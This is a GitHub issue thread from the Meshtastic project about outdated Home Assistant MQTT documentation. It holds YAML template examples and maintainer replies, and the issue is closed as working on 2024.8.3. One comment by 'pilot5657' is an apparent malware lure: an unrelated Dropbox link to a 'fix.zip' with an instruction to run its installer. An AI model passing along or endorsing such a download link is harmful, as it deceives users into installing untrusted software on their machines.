meshtastic/meshtastic #1400: [Documentation Change Request] Home Assistant Integration

gergy008, 2024-08-26:
Please - if you just have a question, post in our [forum](https://meshtastic.discourse.group) instead. Please reserve this system for requesting changes to the Meshtastic documentation.

**Describe what section of the docs is outdated or otherwise in need of change**
Whether due to changes via home assistant, or through the use of Mosquito, The MQTT / home assistant documentation page is outdated. I managed to patch the provided example code in order to get this to work, but it was a significant challenge and is not inferable from the information provided. I'm not sure what the changes were exactly, but I can provide working functions.
This affects most of the content, but specifically I ran into issues where I'm setting up device trackers and meshtastic device telemetry. YMMV.

**Suggested Changes**
According to Home Assistant documentation, either use of value_json.payload or value_json['payload'] should work, but the former did not work in any case and changing from the latter back to the former presents a warning and configurations refuse to load.

Provided example code makes extensive use of `value_json.payload.xx is defined` which appears to be an invalid template. All references should be changed to `(value_json['payload']['xx'] | is_defined)` which as far as I can tell, is the only accepted method of checking if a value is available to use.

Documentation also makes use of `{{ this.state }}` which appears to be an invalid use of the state function. If the value is being set for the first time, I believe that Home Assistant configuration checks will verify that this.state exists beforehand and refuse to accept the template with a warning if the value is not set. `{{ float(this['state'], 0) }}` will fix this issue. Once the value has been set, this['state'] works fine again. Strange.

**Additional Notes**
The code I have provided below has been tested _extensively_, with many variations resulting in complete failure. It follows the practices provided in the Home Assistant documentation available via [Home Assistant Integrations - MQTT device tracker](https://www.home-assistant.io/integrations/device_tracker.mqtt/) and via [Home Assistant Documentation - Templating](https://www.home-assistant.io/docs/configuration/templating/)

Here is a working sensor, used in `configuration.yaml` (Or better yet, in mqtt.yaml with the use of `mqtt: !include mqtt.yaml` inside `configuration.yaml` instead):
```YAML
sensor:
# Example Device
  - name: "Example Device ChUtil"
    unique_id: "example_device_chutil"
    state_topic: "meshtastic/2/json/LongFast/!aaaaaaaa"
    state_class: measurement
    value_template: >-
      {% if value_json['from'] == 0123456789 and (value_json['payload']['channel_utilization'] | is_defined) %}
        {{ float(value_json['payload']['channel_utilization'] | float) | round(2) }}
      {% else %}
        {{ float(this['state'], 0) }}
      {% endif %}
    unit_of_measurement: "%"
```

Here is a working automation, used in `automations.yaml`:
```YAML
- id: '1000000000000'
  alias: Update Example Device GPS Position
  description: Update Meshtastic node when corresponding MQTT messages are seen.
  trigger:
  - platform: mqtt
    topic: meshtastic/2/json/LongFast/!aaaaaaaa
    payload: 'on'
    value_template: '{% if value_json.from == 0123456789 and value_json.type == "position"
      %}on{% endif %}'
  condition: []
  action:
  - metadata: {}
    data:
      dev_id: example_device
      gps:
      - '{{ (trigger.payload | from_json).payload.latitude_i | int * 1e-7 }}'
      - '{{ (trigger.payload | from_json).payload.longitude_i | int * 1e-7 }}'
      battery: '{{ states(''sensor.example_device_battery_percent'')|float(0)
        }}'
    action: device_tracker.see
  mode: single
```

The difference between the examples causes more questions than answers, especially how & why it's so confusing that converting `dictionary['key']` back to `dictionary.key` in those configuration files causes a complete failure; resulting in configuration errors.

I feel that Home Assistant may have a bug, so I'll raise an issue with them. In the meantime, there are other issues that need to be addressed in the docs for Meshtastic. Those examples do not work out of the box any more :(

ianmcorvidae, 2024-08-26:
What version of Home Assistant are you using? All of the stuff as documented still works fine on my install at 2024.7.4, so I guess this must be new as of 2024.8?

As far as I'm aware, `this.state` is the recommended way of doing that stuff, but maybe they've changed something for some reason. `is defined` is directly part of Jinja2 itself, which makes it very strange if that's suddenly stopped working.

pilot5657, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

gergy008, 2024-08-26:
Apologies for the delay - I'm running the new 2024.8.3.

I will be doing some more testing, now that I have a working configuration, on which values are producing the most problems. I've noticed that using `{{ this.state }}` is causing a large part of the issues, because `{{ this }}` doesn't exist yet on the first configuration.

pdxlocations, 2024-08-31:
Also running 2024.8.3.  The configs as documented are working fine for me.

pdxlocations, 2024-09-05:
Wait a minute, when did I update?
[image]

pdxlocations, 2024-09-06:
Seems my mesh hit it's tipping point around Aug 26th and telemetry stopped sending.  I've switched to MediumFast and all nodes are reporting in using settings created by:
https://github.com/pdxlocations/meshtastic-ha-entity-builder
This is based of the code currently in docs.
my config here: [mqtt.yaml.zip](https://github.com/user-attachments/files/16910674/mqtt.yaml.zip)

Closing since the documented code is working with 2024.8.3.  Feel free to reopen if you discover anything contrary.

closed 2024-09-06 by pdxlocations